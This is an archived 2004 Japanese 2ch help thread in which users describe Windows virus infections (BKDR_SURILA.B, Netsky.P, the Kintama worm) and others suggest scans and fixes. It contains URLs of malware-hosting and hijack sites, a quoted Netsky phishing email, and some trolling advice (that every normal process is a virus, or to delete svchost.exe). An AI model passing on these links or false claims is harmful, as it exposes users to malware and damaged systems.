これはウィルスですか?
あともう一つ
windowsフォルダ内にtwain_32 というフォルダがあるんですが、
ウィルスですか?
教えてください。お願いします。

460 :名無しさん@お腹いっぱい。:04/09/23 13:57:52
BKDR_SURILA.Bってトロイってのに感染したみたいなんだけど
これってどうやって駆除したらいいんですか?
ウイルスバスターで隔離はしてるんだけど。
OSはXPです

461 :名無しさん@お腹いっぱい。:04/09/23 14:19:25
hot_mailに差出人、件名など空白のメールで
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?

462 :名無しさん@お腹いっぱい。:04/09/23 14:49:44
>459
ウイルスかと疑うならウイルスチェックしてください
アンチウイルスソフトをもってなければオンラインスキャンでもどうぞ

>460
まずは>85-86をどうぞ

463 :名無しさん@お腹いっぱい。:04/09/23 16:32:31
>>461
2階の窓から放り投げれば消える

464 :名無しさん@お腹いっぱい。:04/09/23 16:53:04
>>463
なんてこと言うんだ。>>461さんがかわいそうじゃないか。
この場合はあれだ。HDDフォーマットだ。うん、これだ。

465 :名無しさん@お腹いっぱい。:04/09/23 17:33:36
ウィルスソフトで修復できないウィルスってありますか?

466 :名無しさん@お腹いっぱい。:04/09/23 17:34:18
ウイルスソフトじゃなぁ

467 :名無しさん@お腹いっぱい。:04/09/23 18:03:47
http://gb.bbs.ws/book.php?book=gall1
これ踏んでしまったのですが、感染してるか確認するにはどうすればいいのですか?
スタートアップみても特に追加されてなかったので・・
環境はWinXpでブラウザはIE6(sp2なし)です
アップデートはSP2以外入れてあります

468 :名無しさん@お腹いっぱい。:04/09/23 18:11:23
>467
地雷サイトに直リンすんな!
これ踏んで被害者が出たらどうすんだ

アンチウイルスソフト入れてなければ
TrendmicroでもSymantecでもMcAfeeでもいいから
サイト行ってオンラインスキャンして来い

469 :名無しさん@お腹いっぱい。:04/09/23 18:18:31
>>465
BCG

470 :名無しさん@お腹いっぱい。:04/09/23 19:06:22
>>467
氏ね!

471 :名無しさん@お腹いっぱい。:04/09/23 19:15:01
うっせーばか

472 :名無しさん@お腹いっぱい。:04/09/23 20:40:53
苺 き ん た ま
http://pc5.2ch.net/test/read.cgi/sec/1095928547/


473 :名無しさん@お腹いっぱい。:04/09/23 21:21:37
>>473
市ね

474 :名無しさん@お腹いっぱい。:04/09/23 21:23:25
473 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/09/23 21:21:37
>>473
市ね

475 :名無しさん@お腹いっぱい。:04/09/23 21:33:49
473 名前:名無しさん@お腹いっぱい。 投稿日:04/09/23 21:21:37
>>473
市ね


476 :名無しさん@お腹いっぱい。:04/09/23 21:44:36
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウィルスバスター2004
【Updateしてるか】 はい
【ウイルス名】 BKDR AGENT.K (SYSTEM32内の.dllファイルで発見)
【症状を具体的に、分かる限りすべて書く】
その.dllファイルにマウスカーソルをあてて選択状態にした時と、
Internet Explorerを起動した時にウィルス発見のメッセージが出る。
しかも『隔離できませんでした』と。
【何をしたらそんなことになったのか】
普通に常時接続で
【これまでにとった措置】
その.dllファイルを削除しようとしてもエラーメッセージが出て失敗。

こんな状態なんですが、どうしたら削除できますかね?

477 :名無しさん@お腹いっぱい。:04/09/23 22:18:42
>>476
まったく同じ症状です
うpでーとしたら感染しますた・・・orz

478 :名無しさん@お腹いっぱい。:04/09/23 22:39:32
>>479
市ね

479 :名無しさん@お腹いっぱい。:04/09/23 22:50:45
なんで死ななきゃいけないの?

480 :名無しさん@お腹いっぱい。:04/09/23 23:15:09
>>481
市ぬ

481 :名無しさん@お腹いっぱい。:04/09/23 23:18:53
【使用OS】 WindowsXP Home

【WindowsUpdateしてるか】 してません

【AntiVirusは何を使っているか】 ノートン2004

【Updateしてるか】 してません

【ウイルス名】 Unix.Penguin こんなんが次々と

【症状を具体的に、分かる限りすべて書く】
ブラウザのホームページが
http://213.159.117.134/index.php
になっていました。インターネットオプションで設定変えようとしても
こっちのほうが便利だというような英語のウィンドウがでて変更できません。
2ちゃん見たりは普通にできます。

【何をしたらそんなことになったのか】
愚息がエロサイト拝見しておりました

【これまでにとった措置】
スキャンしたりいまさらウィンドウズアップデイトしたりしましたが
状況は変わりません。

識者の方ご指導お願いします。


482 :やちゃた:04/09/23 23:21:40
みなさんの知恵を貸してください。
調べることは調べたのですが、対抗策がいっこうに見つからないのです。

OS:2000
症状:とあるゲーム(居昇殿?)の最中急に重くなり、
   次からそのゲームを立ち上げるたびにウィルスバスター2004から
   名BKDR_SURILA.B 場所C:\WINDOWS\system32\SVKP.sys
   のウィルス隔離の表示が出ます。
推測:ゲームからとか、ゲーム内に規制したのではなく、画面を変更?するときに
   活動してるのかなー

やったこと:これが間違った。レジストリーをいじってしまいました。
      調べに調べたが同名のウイルスの情報が見つからず、
      丸1日使ってとうとう、軽はずみに
      えーい!怪しいのは全部削除だ!!としてしまい
      ウイルスは残ったままで、ワード、エクセル、メール送信
      ができなくなってしまった。私はおおうつけです。
      オフィスのCDも受け付けてくれない....

皆さんに助けてほしいこと:私の失敗で動かなくなったものは自己責任
             しかし、この BKDR_SURILA.B とやらの
             正体と対策を教えていただきたい。

 お願いします。

483 :名無しさん@お腹いっぱい。:04/09/23 23:26:38
>>482
大ジョブだ、気にスンナ

484 :名無しさん@お腹いっぱい。:04/09/23 23:53:28
>>482
知りたい事はBKDR_SURILA.Bの正体と対策で
ワード、エクセル、メール送信を出来るようにはしたくないのか…

485 :名無しさん@お腹いっぱい。:04/09/23 23:57:20
>>481
えーとですね、その使用環境だとウイルスやワームやトロイや
スパイウエアやアドウエアやらにかなりやられてると思いますので
OS再インストールした方が手っ取り早いと、私は思います。

>>482
最新パターンファイルに乗ってるぐらい新しい奴だから解説もなし。
解説できるまでマターリ待っとけ。

486 :名無しさん@お腹いっぱい。:04/09/24 00:06:27
hot_mailに差出人、件名など空白のメールで
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?

487 :失意のぼる:04/09/24 00:15:14
>>482
駆除はざっくり逝ってpandaのオンラインスキャン、
hostファイル&レジストリ掃除
烏賊サイトに書いてあるからじっくり読む
(当然性質も書いてある)

ttp://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=vis&idvirus=51005
ttp://www.sophos.com/virusinfo/analyses/w32surilab.html
英語読めないなら翻訳サイト経由で読む


488 :名無しさん@お腹いっぱい。:04/09/24 00:50:34
>>486
基本的にHotmailにはウィルスは来ないんだよねむ

489 :名無しさん@お腹いっぱい。:04/09/24 00:51:32
すんません、教えていただきたいです。
自分はサイトが作れる程度のHTMLしか知らん、Win2000を使っている者です。

最近ウィルスに感染してウィルスバスターで一応駆除したのですが、
キンタマに感染してたのかどうか不安です。
苺キンタマなどのウィルスに感染していない通常のとき、
タスクマネージャーのプロセスにexeファイルが表示されることはあるんでしょうか?

今表示されているexeは下です。
SMSS.EXE     CSRSS.EXE    WINLOGON.EXE   LSASS.EXE
svchost.exe   spoolsv.exe    Ctsvccda.exe   svchost.exe
regsvc.exe    mstask.exe    WinMgmt.exe    mspmspsv.exe
svchost.exe   tmproxy.exe    imejpmgr.exe    svchost.exe
realsched.exe   explorer.exe   NewsUpd.exe   internat.exe
BsCLiP.exe    OSA.EXE      PCCPFW.exe    conime.exe
YPagerJ.exe   Tmntsrv.exe    PCClient.exe   pccguide.exe
TMOAgent.exe   IEXPLORE.EXE   TASKMGR.EXE

490 :名無しさん@お腹いっぱい。:04/09/24 00:54:13
>>489
SMSS.EXE     CSRSS.EXE    WINLOGON.EXE   LSASS.EXE
svchost.exe   spoolsv.exe    Ctsvccda.exe   svchost.exe
regsvc.exe    mstask.exe    WinMgmt.exe    mspmspsv.exe
svchost.exe   tmproxy.exe    imejpmgr.exe    svchost.exe
realsched.exe   explorer.exe   NewsUpd.exe   internat.exe
BsCLiP.exe    OSA.EXE      PCCPFW.exe    conime.exe
YPagerJ.exe   Tmntsrv.exe    PCClient.exe   pccguide.exe
TMOAgent.exe   IEXPLORE.EXE   TASKMGR.EXE

残念ながら全てウィルスです

491 :名無しさん@お腹いっぱい。:04/09/24 00:58:00
>>489
ここにタスクリストがある。英語だけど大体の意味は辞書引きながら
わかるはず。

ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm

492 :名無しさん@お腹いっぱい。:04/09/24 00:59:20
ログリスト
"時刻","検索の種類","種類","ウイルス名","感染元","ウイルス検出時の処理","ウイルス駆除できない場合の処理"
"00:18","受信メール検索","e-mail","HTML_Netsky.P","Mail Delivery System <Mailer-Daemon@mt170.cocospace.com> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
"00:18","受信メール検索","e-mail","WORM_NETSKY.P","Mail Delivery System <Mailer-Daemon@mt170.cocospace.com> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"

この2個のメール受信後メール送るたびに添え付けFILEが自動添付されるようになり
困ってます、、

この場合の対処法ご存知の方ご教授おねがいします。

493 :名無しさん@お腹いっぱい。:04/09/24 01:10:54
>>490-491
ありがとうございます。やはりウィルスですか…
ちなみにこれは通常のウィルスかキンタマ系ウィルスかわかるでしょうか?

494 :491:04/09/24 01:17:47
>>493
違う違う。俺が貼ったサイトは通常、普通にあるタスクの一覧。
他にアプリ入れてたら、載ってないのもあるし。

ちょっと祭り会場にいきたいんで、んじゃノシ

495 :名無しさん@お腹いっぱい。:04/09/24 01:20:30
>493
これで解らないのがあったら>491さんので・・・と参考までに
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://homepage2.nifty.com/tomokatsu/tech07.html

496 :名無しさん@お腹いっぱい。:04/09/24 01:21:48
>493
載ってなくてウイルスかどうかを判断するにはググるのが一番良い

497 :名無しさん@お腹いっぱい。:04/09/24 01:21:51
ウィルスに感染してる時に
自分のデスクトップにある画像やらをCD-RWに保存した場合、何か問題はありますか?

498 :名無しさん@お腹いっぱい。:04/09/24 01:26:09
>>485
ありがとうございます。
以後気をつけます。

499 :名無しさん@お腹いっぱい。:04/09/24 01:26:21
>497
何らかの形で実行しなければ問題ない

500 :名無しさん@お腹いっぱい。:04/09/24 01:51:56
>>498
【総合】スパイウェア予防駆除 Part4
http://pc5.2ch.net/test/read.cgi/sec/1089126024/

501 :名無しさん@お腹いっぱい。:04/09/24 01:54:06
すいません、>>482と同じウイルスにかかったことがトレンドマイクロのオンラインスキャンで分かったのですが・・・
ゲーム中、急にブルースクリーンになって、スキャンしてみたんですが、なにをしているウイルスなのか説明が無くとても不安なんです。
調べてみても、バックドアを作られてコンピュータの情報が見られてしまうくらいしかわかりませんでした。
そしてpandaのオンラインスキャンで駆除を試みたのですが、こちらでは検出されませんでした。

このウイルスはどのようにして削除すればよいのでしょうか?
また、放っておくとどうなってしまうのでしょう?



502 :名無しさん@お腹いっぱい。:04/09/24 02:10:49
ウィルスバスターが「ウィルスに感染したので自動修復しました」
ってなったんですけど、ウィルス名「DEADLINK」ってどんなやつでしょうか?

トレンドマイクロのデータベースで調べてもでてこないので・・・

503 :名無しさん@お腹いっぱい。:04/09/24 02:34:32
>>502
ウイルスじゃなくて、死んでるレジストリ消すだけみたい。

ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=DEADLINK

504 :名無しさん@お腹いっぱい。:04/09/24 02:57:51
>>503

なるほど、ありがとうございましたm(__)m

505 :名無しさん@お腹いっぱい。:04/09/24 02:58:22
すいません質問です
今日初めてPandaでオンラインスキャンしてたとき
avast!のスクリーンセーバーでスキャンするやつも始まって
Pandaのオンラインスキャンの始めにダウソされるファイルに
Win32:Kuang2が検出されたのですがこれは大丈夫でしょうか?
調べたらバックドアトロイの木馬で、スキャンの為に入れられたのかな?とおもったんですが不安です。
ちなみにOSはWin98でAD-awareSEとSpybotとSpywerBlasterとOutpostが他にはいってます

506 :名無しさん@お腹いっぱい。:04/09/24 03:17:58
名前: 名無しさん
内容:
デスノートが最終話だってさ
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身は来週のジャンプ詰め合わせだ
       ↑
不覚にも、これexe.file(すでに404)を踏んでしまいました。
スキャンしてウィルスではなかったのはいいが、
ファイル削除したのに、 いまだに処理速度が遅いままなのです。

このexeをゴミ箱に捨てようとしたら、削除できないって出たけど、
電源入れなおしたら、削除できました。 その後、インターネットオプションで
クッキーやらファイルの削除も全部したけれども、 遅いままなのです。

エクスプローラで「exe」を検索して確答したものがあったんで、
一つ消したけど、遅いまま。「prefetch」とか書かれてたような。
もう削除してよく覚えてないけど。 根源は絶ったのですが、
それに付随するファイル等がどれなのか分かりません。
それらのファイルが処理を遅くしているはずなのですが、
その探し方が分かりません。 _| ̄|○

誰か元に戻すやり方を知りませんか?
ちなみにOSはXPです。

507 :名無しさん@お腹いっぱい。:04/09/24 03:20:53
>>506
それデスクトップ画像とかうpロダに晒されてるみたいだよ
キンタマだね。どっかに皿仕上げスレあるから。
ちなみに削除の仕方はシラネ
セーフモードでもやってみれば?

508 :名無しさん@お腹いっぱい。:04/09/24 03:21:01
>>506
遅い=CPU使ってる
遅い=HD読んでる

どっち?

509 :名無しさん@お腹いっぱい。:04/09/24 03:23:12
>>506
すいません。ageてしまいました。

処理の遅さについてですが、ブラウザ、
ワード、エクセルなど、立ち上げる際の
速度が異常に遅くなりました。

警告マークで「shellsystem リストのインデックスが
範囲を超えています(0)」としばしば表示されます。

510 :名無しさん@お腹いっぱい。:04/09/24 03:25:25
>509
タスクマネージャーは?

511 :名無しさん@お腹いっぱい。:04/09/24 03:26:52
>>508さん
すいません、どういう意味でしょうか?

その時はlive2chを使っていて、スレから直接ダウンロードしました。
自業自得なんですが、ファイルの安全を確認する前に
解凍してしまいました(デスクトップに表示された)。


512 :名無しさん@お腹いっぱい。:04/09/24 03:26:56
>>509
いやHDずっと読んでいるかとか
Crtl+Alt+Deleteキーでタスクマネージャー出して
パフォーマンスでCPUの100%?

100%ならプロセスでCPU食ってるプロセス探してみ

513 :名無しさん@お腹いっぱい。:04/09/24 03:32:36
>505
こんなのみっけた

57 :51 :04/06/23 00:13 ID:???
>>54
その通りでした・・・_| ̄|○
PandaのインターネットセキュリティをDLしていたら
Win32:Kuang2っていうやつとWin95:Matyas
というのも一緒にもらっていました。アンチウィルス
ソフトをDLして、ウィルスも一緒につけてくれるとは
なんて親切な企業なんだ。感動した!!

514 :名無しさん@お腹いっぱい。:04/09/24 03:33:20
>>512
タスクマネージャーの存在自体知りませんでした。
今見たら、CPUが100%になっていました。

プロセスを見たんですが、どれを削っていいのか
分かりません。shellsystem.exeやOmgtray.exe.や
QCONSVC.EXEやsvchost.exeなどまったく身に覚えのないやつは
削除しても何の悪影響はでませんか?


515 :名無しさん@お腹いっぱい。:04/09/24 03:34:01
RegCleaner(レジストリを整理するソフト)を使って、
特定のレジストリを消去しようとすると、物理、仮想メモリ、共に満タンになってしまいます。
これはウイルスなのでしょうか?アンチウイルスソフトで引っかかりませんでしたし、
WindowsUpdateも先日済ませたばかりです。
それと、この件に関係するとは思うのですが、MP3エンコーダーの処理速度が落ちましたし、
MP3タグ管理ソフトで、一括でタグ情報を変更しようとすると、これまた前よりも時間が掛かるようになりました。
一体何が原因なのでしょうか?

516 :名無しさん@お腹いっぱい。:04/09/24 03:35:45
>>514
svchost.exeはすぐ消すべし

517 :名無しさん@お腹いっぱい。:04/09/24 03:39:26
>>516
嘘付くなよ
消したら動かなくなるはず

518 :名無しさん@お腹いっぱい。:04/09/24 03:41:00
>>514
その中で特にCPU食ってるプロセスはどれ?
イメージ名|ユーザー名|CPU|
って描いてるところのCPUをクリックするとソートされるから

519 :名無しさん@お腹いっぱい。:04/09/24 03:42:29
svchost関連のウイルスは有るけどそれに感染してる事は無いかもしれないし
消す必要が無い、消してもPCが動かなくなる事は無いがネットするのにに何らかの支障が出る

520 :名無しさん@お腹いっぱい。:04/09/24 03:43:09
≫517
パソコンが動かなくなりました 携帯から書き込んでます
たすけてください

521 :名無しさん@お腹いっぱい。:04/09/24 03:44:06
( ´,_ゝ`)

522 :名無しさん@お腹いっぱい。:04/09/24 03:45:39
>>516さん
どのexeファイルが危険なのか、どうやって判断するのでしょうか?
どこかサイトを参照してますか?他にも

SPTISRV.exe、shellsystem、Omgtray、WinCinemaMgr
svchost、QCONSVC、ctfmon、mdn、avgserv、LEXPPS
spoolsv、avgcc32、rnathchk、qttask、ibmpmsvc
Isass、services、winlogon、csrss、smss、tp4serv
igfxtray、LTSMMSG、alg、hkcmd、realsched

不明なファイルがずらりと。どれ削っていいのでしょう?
すいません、何も分からなくて。


523 :名無しさん@お腹いっぱい。:04/09/24 03:50:38
>>522
全部ぐぐって見れば?

524 :名無しさん@お腹いっぱい。:04/09/24 03:50:52
>>518さん
容量多い順に並べると、
iexplore.exe(24,298K)>live2ch(24,780)>svchost(22,624)
>explore(21,376)>Omgtray(11,836)>shellsystem(7,356)
>csrss(7,208)>以下略

こんな感じです。

525 :名無しさん@お腹いっぱい。:04/09/24 03:54:38
>>524
ここ読んでみな
http://www.geocities.jp/ichigo_kintama/

526 :505:04/09/24 03:57:17
うほっ
>513さんサンクス
俺も感動したよ、ほかのPandaでスキャンした人はどうしてるんですか?

527 :名無しさん@お腹いっぱい。:04/09/24 04:00:20
>522
しかしうちには入ってないものはずらりと並んでるな
ctfmonはhttp://pasokoma.jp/bbs4/pslg17330.html

528 :名無しさん@お腹いっぱい。:04/09/24 04:02:54
>>524
CPU使ってるパーセンテージの事で容量ではないよ
CPUが常時100%ならどれかのプロセスが異常にCPU使ってるから
まずそれを見つけること

529 :名無しさん@お腹いっぱい。:04/09/24 04:16:34
把握できないぐらいプロセス多くて迷うならOS再インスコした方がいいよ
これからアプリを一つインスコする度にタスク(増えたプロセス)確認してチェックしとけばいい
不具合あったときにほぼ即解決できるし

530 :名無しさん@お腹いっぱい。:04/09/24 04:18:12
ソートしろよ

531 :名無しさん@お腹いっぱい。:04/09/24 04:36:01
shellsystemを消したら、速度が戻ったんですが、
再起動したら、復活してました。_| ̄|○

タスクマネージャーからまた削除しようとしたのですが、
今度は削除できなくなりました。

OSインストールしなおしたら、いらないもの全部消えますか?

532 :名無しさん@お腹いっぱい。:04/09/24 04:37:41
>531
hai

533 :名無しさん@お腹いっぱい。:04/09/24 04:38:54
>>528さん
CPU食ってるのは、shellsysytemとかいうやつでです。
2つあるんですが、2つあわせて100近くになってます。

534 :名無しさん@お腹いっぱい。:04/09/24 04:42:10
osはユニクスですか・・・?

535 :名無しさん@お腹いっぱい。:04/09/24 04:51:33
XPの「システムの復元」をやってみたんですが、
未完了と出て、失敗しました。

どうやったら、shellsystemを消すことが出来るでしょうか?

536 :名無しさん@お腹いっぱい。:04/09/24 05:27:47
>>460と同じウィルスにかかりました。BKDR_SURILA.Bってやつです
トレンドマイクロのオンラインスキャンで、感染ファイルを3箇所発見したんですが
どこのデータベースにも載っておらず、駆除方法がよくわかりません。
感染していたファイル名でググったら、
Win-Trojan/MyDoom.234496っていうワームの解説が見つかって、そこにあった
Windows システムフォルダ SVKP.sys (2,368 バイト)
というのが一致したのですが、これも該当するデータベースがほとんどありませんでした…
紹介されていたページのセキュリティソフトを購入すれば大丈夫なのでしょうけども(2社しかありませんでしたが…)、
手動駆除はできるんでしょうか?

537 :名無しさん@お腹いっぱい。:04/09/24 05:28:20
ここみぃ

ttp://planet-d.hp.infoseek.co.jp/matome/2004/ichigokintama.html

538 :名無しさん@お腹いっぱい。:04/09/24 05:35:56
すみません、検索したはずだったのに>>482を見落としてました…
手動だけでは難しいみたいですね、失礼しました。

539 :名無しさん@お腹いっぱい。:04/09/24 05:46:55
やっとshellsystem消えてくれました。
手動で消したんですが、今回は復活しませんでした。
また復活しそうで怖い。

でも、まだよく分からないexeファイルがいっぱいあるので、
CD見つかり次第、OSを再インスト−ルし直します。

とりあえず機能が戻ったんで、ちょっと嬉しいです。
助言くれた方に再度感謝します。



540 :名無しさん@お腹いっぱい。:04/09/24 06:24:03
http://www.geocities.jp/ichigo_kintama/
こっちも見とけ

541 :やちゃた:04/09/24 07:28:39
482のBKDR_SURILA.Bの持ち主です。みなさん、いろいろ情報
ありがとうございます。
>>460さん 
見落として同じ事を聞いていました。すみません。
>>483さん
仕事でPC使うので死活問題。気にします。
>>484さん
 いえ、そりゃ全部直したいですよ。でも方法はどこ壊れたか、
 ここで聞けないから、まずウイルスのこと教えてくださいと
 しました。
>>485さん
 そうですね。それがベストだった気がします。あと1週間も
 すればウイルスバスターも動いてくれるかな?
>>487さん
  ありがとうございます。今もてる最高の情報でした。しか
 しホストファイルは探し出せませんでした。オンラインはO
 UTLOOK使ってくれということで最後までしてません。
>>その他の私と同じウイルスの持ち主さん、
 忍耐?で、がんばりましょうね。

取りあえず、BKDR_SURILA.B は最新パターンで取り扱ってい
るのも外国の数社で、対抗策は見えず、わかりやすい日本版を
待つのがベターかと判断しました。
 私は自分の壊してしまったところを修復していくのを優先す
ることにします。

542 :名無しさん@お腹いっぱい。:04/09/24 09:34:41
【使用OS、WindowsUpdateの有無】Win2k,月に一回程度
【使用AntiVirus、Updateの有無】AVG,Norton体験版
【スキャンした結果(ウイルス名・発見場所)】なし
【症状】ネットワークが全く機能しない。同じネットワークのマシンすら見えない。
Z*******.tmpという実に怪しいファイルがtempフォルダに毎回起動時に生成される。*は毎回異なる。
【これまでにとった措置】spybot,ad-aware,AVG,Norton(Nortonは怪しいと思った瞬間にインスコしました)によるチェック済み。

おそらくなんかのトロイを食らっているような気がするのですが、
スキャンしても何も出てこないのが・・。
同じLANのなかの別のマシンからはこうして2chにも接続できるので、単なるLANの不良ではなさぽ。
ちなみに怪しい.tmpのファイルは「使用中の可能性が〜」とのことで削除もウイルスチェックもさせてもらえません。
どうかお知恵をお貸しください。

543 :542:04/09/24 09:41:19
ちなみに、ZoneAlarmのログを見ると、なんだかえらい頻度で通信をブロックしているようです。
今はネットワークそのものを無効にしているので何もありませんが・・。

544 :名無しさん@お腹いっぱい。:04/09/24 09:52:11
>>542-543
AVGとNorton体験版を同時に入れちゃだめ、Nortonはアンインストールしろ
他のソフトで並行してスキャンしたい時は、オンラインスキャンを使うべし
トロイを疑うのなら、アンチトロイソフトでも入れてスキャンしてみろ
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/

セーフモードでウィルススキャンすれば、「使用中の可能性が〜」のものは駆除できる

545 :544:04/09/24 09:54:15
【使用OS、WindowsUpdateの有無】Win2k,月に一回程度
Windows2000なら、自動的に「重要な更新」をダウンロードしてインストールする設定にできるはず
WindowsUpdateはくまなくやって、その設定をしておけ。月に1回じゃ少なすぎ

546 :名無しさん@お腹いっぱい。:04/09/24 09:56:13
苺キンタマに引っかかった奴って炉愛好者なんでしょ?

547 :名無しさん@お腹いっぱい。:04/09/24 10:15:30
>>542
ZA入れてからちゃんとできてた?
ZAが邪魔しているということはありえませんか?
そうすれば頻繁に通信をブロックしているということも説明できる。
んでそのファイルがブロックのログということは?


548 :名無しさん@お腹いっぱい。:04/09/24 10:52:22
すいません、メールを送ってないのにノートンにメールが送れませんでしたと出てくるのですが・・・
アドレスはいつも一緒の所に送られているようで・・・

549 :失意のぼる:04/09/24 11:01:49
>>541
VB2004で隔離した(検出した)ファイルはsvkp.sys以外にも
あるんでないの?
(たとえば、dx32cxlp.exe/dx32cxel.sys/dx32cxconf.ini)

SURILA.Bは別ワームMydoom.ほげほげがダウンするものらしい
そしてMydoom.ほげほげは亜種がたくさんあって、チミの情報
だけじゃ絞り込めぬ。
(pandaにもその旨書いてあるんだが本当に対応しきれてるのか
が疑問に思えてきた)

上の情報があれば絞り込みができるかもしれない。
(回答できるとしても早くて夜以降になるけど)
隔離してるからほおっておいても実害はないと思うけど気になるなら
書いてみるとよろし。

ちなみにhostsファイル(hostはtypo)は
95/98/ME: C:\Windows\System フォルダ
NT/2000: C:\WinNT\System32\Drivers\ETC フォルダ,
XP: C:\Windows\System32\Drivers\ETC フォルダ
でメモ帳なんかで確認できる
でふぉではエントリとしてコメント行(#で始まる)以外に
127.0.0.1 localhost
がある
このファイルだけなおしても意味ないけどね

手動削除手順は以下のような感じになると思う(スペイン語)
ttp://www.softdownload.org/fichas/masbuscados/virusreport/guias_de_seguridad/trojsurila.naa.2._3166.asp

550 :W32.Netsky.P@mm:04/09/24 13:17:07
Return-Path: <noreply@paypal.com>
Received:from ttb2-ip008.user.xsp.fenics.jp (EHLO yahoo.co.jp) (219.97.237.8)
by **
From: noreply@paypal.com
To: **
Subject: Thank you!
Date: **
MIME-Version:1.0 Content-Type:multipart/mixed;
X-Priority:3 X-MSMail-Priority:Normal

Your bill is attached to this mail.

ファイル名: bill.zip
ファイルの種類: application/octet-stream
スキャン結果: W32.Netsky.P@mmというウイルスが見つかりました。

551 :W32.Netsky.P@mm:04/09/24 13:17:34
http://www.symantec.com/region/jp/sarcj/data/w/w32.netsky.p@mm.html
より、
差出人:noreply@paypal.com
件名:
Congratulations!
Thank you!

本文:
You were registered to the pay system.
For more details see the attachment.

Your bill is attached to this mail.

552 :W32.Netsky.P@mm:04/09/24 13:18:07
W32.Netsky.P@mm!enc に感染しているファイルが検出された場合、
そのファイルには、MIME 形式でエンコードされたW32.Netsky.P@mm ワーム
が含まれています。
http://www.symantec.com/region/jp/sarcj/data/w/w32.netsky.p@mm!enc.html

末尾に.encが付いた検出名が通知される場合の対処方法
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html

553 :542:04/09/24 15:15:59
542です。出先からなので今すぐというわけにいきませんが、
自宅に帰ったら試してみたいと思います。よろしくお願いいたします。
結果は後ほど報告させていただきます。

>>544
もともとは併用ではなかったのです。
少しずつパフォーマンスが低下しているネットワークに異変を感じて
シマンテックのオンラインスキャンを試していたら、そのうちにネットワークが完全に死亡。
AVGでスキャンしても異常なし。
シマンテックのスキャンの途中経過に感染ファイルがいくつかピックアップされていたので
これではいけない、と別マシンで体験版をDLし、死亡機にインスコ。
感染ファイル発見→削除→直んねぇ・・・。
という経緯だったのです。

重要な更新はDLしてインスコする設定になっていました。
そのほかに月に一回、ということです。
書き方が悪かったですね、もうしわけありません。
セーフモードでのスキャン、アンチトロイ、試してみます。ありがとうございます。

>>547
ZAは以前より導入していましたし、試しにZAを終了させても事態が変わらなかったので
おそらくZAは原因ではないと思います。
ただ、一分おきにincomingに対してブロックしているという状況は
いささか異常なのではないかと思って書き添えました。
ファイルは(出先なので記憶があいまいですが)256バイトだったように思います。ログにしては小さいです。
ともあれ、ありがとうございます。

554 :名無しさん@お腹いっぱい。:04/09/24 16:43:21
質問します。
w2kで、あるソフトを起動、うまく動かないので、再起動。
英語のメッセージが出てエラー。
ファイルだけでも救出しようと、もう1台のパソコンにその起動HDDを接続し
起動させると、そのパソコンの「ページファイルがありません・・・」で動かず
そのHDをはずしても、そのパソコンまでまともに動かない。
接続、データードライブとして起動しただけで、感染するウイルスってあるのですか?
また、その対策は!?(他人のパソコンまでまきぞいにしてしまい、悲しいです・・・)
m(_ _)m

555 :名無しさん@お腹いっぱい。:04/09/24 16:46:58
WindowsMeを使っています。
急に再起動を繰り返し困っています
ウイルスだと思うのですが何かわかりません。
駆除方法はないのでしょうか?
どなたか助けて下さい・・・

556 :名無しさん@お腹いっぱい。:04/09/24 17:05:03
>>555
>WindowsMeを使っています。
捨てろ。

>急に再起動を繰り返し困っています
へぇ〜

>ウイルスだと思うのですが何かわかりません。
アンチウィルスソフト使えよ。

>駆除方法はないのでしょうか?
何を駆除するんだよ。

>どなたか助けて下さい・・・
そりゃ無理だって。

エスパーさん出番ですよ!


557 :555:04/09/24 17:41:10
ウイルス駆除ソフトは入れていました。
大切なものが入っているので再インスト−ルはどうしても避けたいです・・・

もうどうしたら良いのかわかりません

558 :555:04/09/24 17:42:56
今となっては遅いのですが
バックアップとっていませんでした

559 :名無しさん@お腹いっぱい。:04/09/24 18:29:39
>>555
再インストール

560 :544:04/09/24 18:30:22
>>553
元々併用じゃなかろうが、今の時点で併用してちゃダメなの。
どうしてもノートンでスキャンしたいなら、オンラインスキャン使え。

>>554-555
どんなメッセージが出るのかもわからないし、もしかしてBIOSがぶっ壊れたんじゃねーのか?
ウィルス駆除ソフトは何いれてたかもわからないし、リカバリしろとしか言いようが無い
もっときちんと症状を書け

561 :名無しさん@お腹いっぱい。:04/09/24 18:32:54
方法1 デスクトップ型等ハードディスクが二台つけれるPCの場合

 感染したHDDを取り外す
 もう一台HDDを買って取り付けシステム再インストール&アンチウィルスソフト導入
 感染したHDDをスレーブとして取り付ける
 ウィルス駆除


方法2 ノートPC等のハードディスクが二台つけれないがLANが使えるPCで
     なおかつもう一台LANが使えるPCがある場合

 FD-Sambaを入れたフロッピーディスクを作る(作り方はFD-SambaでGoogle)
 感染したPCをFD-Sambaを入れたフロッピーディスクで起動
 感染したPCもう一台のPCとLANで接続
 大切なデータをコピー

方法3 CD起動が出来るPCである

 ttp://www.jtc-i.co.jp/avast/avast10-bart.htm
 avast! BARD CD(アバスト バートCD 七万二千円)を購入してウィルスを駆除する
 ttp://www.jtc-i.co.jp/avast/avast00-top.htm


562 :555:04/09/24 19:02:19

560さんへ
ありがとうございます。
初心者なので何がなんなのかわかりません。すみません。
わかったら報告します。

561さんへ
ありがとうございます。試してみます!!


